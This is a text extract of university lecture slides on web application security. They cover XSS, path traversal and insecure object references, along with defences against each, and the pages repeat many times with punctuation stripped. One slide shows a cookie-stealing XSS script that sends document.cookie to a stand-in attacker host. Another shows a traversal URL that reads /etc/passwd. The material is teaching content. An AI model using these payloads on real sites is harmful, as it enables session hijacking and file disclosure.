Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 20: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 21: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 22: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 23: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 24: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 25: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 26: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

